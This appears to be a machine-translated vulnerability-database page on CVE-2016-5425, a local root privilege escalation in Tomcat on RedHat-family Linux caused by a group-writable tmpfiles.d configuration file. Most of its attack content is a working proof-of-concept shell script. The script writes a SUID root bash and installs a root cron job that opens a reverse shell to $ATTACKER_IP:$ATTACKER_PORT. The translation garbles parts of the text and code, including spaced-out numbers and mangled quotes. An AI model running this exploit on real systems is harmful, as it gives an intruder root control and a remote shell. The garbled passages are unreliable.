7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
7.2 High
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:L/Au:N/C:C/I:C/A:C
0.001 Low
EPSS
Percentile
47.4%
Description
Tomcat recently always want to engage in some big news, a month are not to, Tomcat and burst vulnerability. 2 0 1 6 1 0 On 1 1 December, online broke the Tomcat local to mention the right vulnerability, vulnerability number CVE-2 0 1 6-5 4 2 and 5. This affected mainly is based on the RedHat distribution version of Apache Tomcat, including CentOS, RedHat And OracleLinux, Fedora, and so on. The main reason is the General Tomcat user has permissions to the/usr/lib/tmpfiles. d/tomcat. conf this configuration file is read, then the user group members or with the normal Tomcat permissions WebShell permissions can be elevated to root level.
Vulnerability description
Based on the RedHat release version of Tomcat after installing tomcat, set the user to tomcat. conf file has write permissions, as follows
[root@localhost ~]# ls-al /usr/lib/tmpfiles. d/tomcat. conf-rw-rw-rβ. 1 root tomcat 4 3 May 1 2 2 0 1 5 /usr/lib/tmpfiles. d/tomcat. conf
tmpfiles. d directory where the configuration file is systemd-tmpfiles used to manage the temporary file, an attacker could very easily inject the malicious payload into the tomcat. conf file, such as a new rally SHELL, the new one has the SUID permission of a file. When/usr/bin/systemd-tmpfiles when executed, the injected payload will get executed.
In REDHAT distributions, the default boot, systemd-tmpfiles will by systemd-tmpfiles-setup. Service service to be implemented, as follows:
[root@localhost www]# cat /usr/lib/systemd/system/systemd-tmpfiles-setup. service |grep ExecStartExecStart=/usr/bin/systemd-tmpfiles --create --remove --boot --exclude-prefix=/dev
Depends on the system used, systemd-tmpfiles may also be through other services, cronjobs,startup scripts, and other ways to trigger. Worthy of note in another place is that systemd-tmpfiles will not because the configuration file syntax errors cause an error stop. Therefore an attacker can easily inject malicious PAYLOAD to/usr/lib/tmpfiles. d/tomcat. conf
According to the following POC, we can see thatΒ·is injected into tomcat. conf meaning is to bounce the SHELL, and the new one has the SUID permissions of the shell,in particular C, z,F meaning, The we can man 5 tmpfiles. d to view.
C /usr/share/tomcat/rootsh 4 7 7 0 root root - /bin/bashz /usr/share/tomcat/rootsh 4 7 7 0 root root-F /etc/cron. d/tomcatexploit 0 6 4 4 root root -"* * * * * root nohup bash-i >/dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0&1
POC
-----------[ tomcat-RH-root.sh ]---------
#!/ bin/bash
ATTACKER_IP=127.0.0.1
ATTACKER_PORT=9 0 9 0
echo-e β\n* Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2 0 1 6-5 4 2 5 *β
echo-e βDiscovered by Dawid Golunski\nβ
echo β[+] Checking vulnerabilityβ
ls-l /usr/lib/tmpfiles. d/tomcat. conf | grep βtomcatβ
if [ $? -ne 0 ]; then
echo βNot vulnerable or the tomcat installed under a different user than βtomcatββ
exit 1
fi
echo-e β\n[+] Your system is vulnerable!β
echo-e β\n[+] Appending data to the /usr/lib/tmpfiles. d/tomcat. confβ¦β
cat>/usr/lib/tmpfiles. d/tomcat. conf
C /usr/share/tomcat/rootsh 4 7 7 0 root root - /bin/bash
z /usr/share/tomcat/rootsh 4 7 7 0 root root -
F /etc/cron. d/tomcatexploit 0 6 4 4 root root -β* * * * * root nohup bash-i >/dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0&1 & \n\nβ
eof
echo β[+] /usr/lib/tmpfiles. d/tomcat. conf contains:β
cat /usr/lib/tmpfiles. d/tomcat. conf
echo-e β\n[+] Payload injected! Wait for your root shellβ¦\nβ
echo-e βOnce β/usr/bin/systemd-tmpfiles --createβ gets executed (on reboot by tmpfiles-setup. service, by cron, by another service etc.),
the rootshell will be created in /usr/share/tomcat/rootsh.
Additionally, a reverse shell should get executed by crond shortly after and connect to $ATTACKER_IP:$ATTACKER_PORT \nβ
--------------[ eof]--------------------
Local test:
7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
7.2 High
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:L/Au:N/C:C/I:C/A:C
0.001 Low
EPSS
Percentile
47.4%